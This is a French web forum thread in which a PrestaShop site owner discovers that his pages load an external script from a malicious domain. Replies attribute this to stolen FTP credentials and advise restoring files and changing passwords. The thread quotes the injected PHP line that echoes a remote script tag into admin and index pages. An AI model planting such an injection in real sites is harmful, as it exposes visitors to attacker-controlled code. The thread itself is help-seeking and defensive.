Virus sur FTP? Comment s'en débarasser?

[boulledogue]

Bonjour à tous,

Voilà quelques mois que je développe un site e-commerce avec Prestashop.

Aujourd'hui, j'ai eu besoin de m'y connecter via Google Chrome, qui me prévient que le site est dangereux, car il possèderait un virus nommé "santiyefesi"... Aucune info sur Google à propos de ce virus, par contre, toutes mes pages HTML affichées possèdent au début le script suivant:

 

"<script type="text/javascript" src="http://santiyesefi.com/mltools.js"></script>"

 

Quelqu'un sait-il si ça a rapport avec Prestashop ou autre chose? J'ai effectué une analyse antivirus sur mon ordinateur et sur le dossier de mon site, ça ne donne rien... Je ne vois pas comment me débarasser de ce problème.

Merci d'avance à tous, voici une capture d'écran du code source de la page administration affichée sous chrome.

Boulledogue

EDIT: j'ai trouvé une ligne bizarre, ligne 1 de administration/login.php & administration/index.php

<?php echo "<script type=\"text/javascript\" src=\"http://santiyesefi.com/mltools.js\"></script>";

 

Surement en rapport, mais ce n'est pas moi qui ai ajouté cette ligne

Edited June 25, 2012 by boulledogue (see edit history)

[Dev On Web]

Bonjour,

 

En effet ce lien est bien malveillant. On peut remarquer qu'il a été ajouté avant même le doctype.

 

Deux possibilités : soit votre fichier header.tpl a été modifié du FTP ?

Soit votre PC est infecté et c'est votre navigateur qui insère malgré lui ce code malveillant sur tous les sites que vous visitez.

 

URL du site ?

[boulledogue]

Hello Devonweb, le site est encore en construction, voici les liens à retenir:

http://restolity.be (accueil + form / page non infectée, je pense)

http://restolity.be/fidelite/ (accueil normal, redirigeant vers le vrai accueil le temps que le site soit fini, donc pas intéressant comme page pour l'instant )

 

et http://restolity.be/.../administration

J'ai édité le sujet, également:

EDIT: j'ai trouvé une ligne bizarre, ligne 1 de administration/login.php & administration/index.php

<?php echo "<script type=\"text/javascript\" src=\"http://santiyesefi.com/mltools.js\"></script>";

 

Peut-être cela vous aidera-t-il, en tout cas ça m'inquiète fortement... Peut-être devrais-je changer le chmod de ces fichiers?

 

EDIT2^^ : Je viens de supprimer les lignes, bien évidemment donc vous ne trouverez plus ce que j'ai mis sur la capture d'écran postée précédemment... J'espère que ça ne reviendra plus... Auriez-vous des idées de tests à effectuer pour voir d'où vient cette ligne sur ces deux fichiers? (et peut-être d'autres)

Il s'est tapé dans chaque fichier index.php de prestashop

Edited June 25, 2012 by boulledogue (see edit history)

[Dev On Web]

Ha ok, vu la ligne, c'est certain que quelque chose (robot) est passé par votre FTP pour modifier vos fichiers php.

Votre PC est sans doute infecté (voleur de mot de passe par exemple). Il est nécessaire de remettre les fichiers d'origines de PS et de changer tous vos mots de passe d'accès.

 

Essayez d'installer aussi un anti-malware (malware's bytes par exemple) sur votre post pour rechercher un peu.

[yvon38]

Bonjour,

voilà une explication ici http://whois.gwebtools.fr/santiyesefi.com

[boulledogue]

Salut, en gros ce sont des indiens qui s'amusent^^

Je fais des recherches anti-malwares, j'en aurais déjà 4 sur mon PC, j'ai supprimé les lignes infectées, j'espère qu'elles ne se réinfecteront pas... je vous tiens au courant, merci pour vos réponses :x

PS: du Https changerait qqch? non hein?

Edited June 25, 2012 by boulledogue (see edit history)

[Dev On Web]

Non, dans ton cas, aucun rapport avec le HTTPS ou pas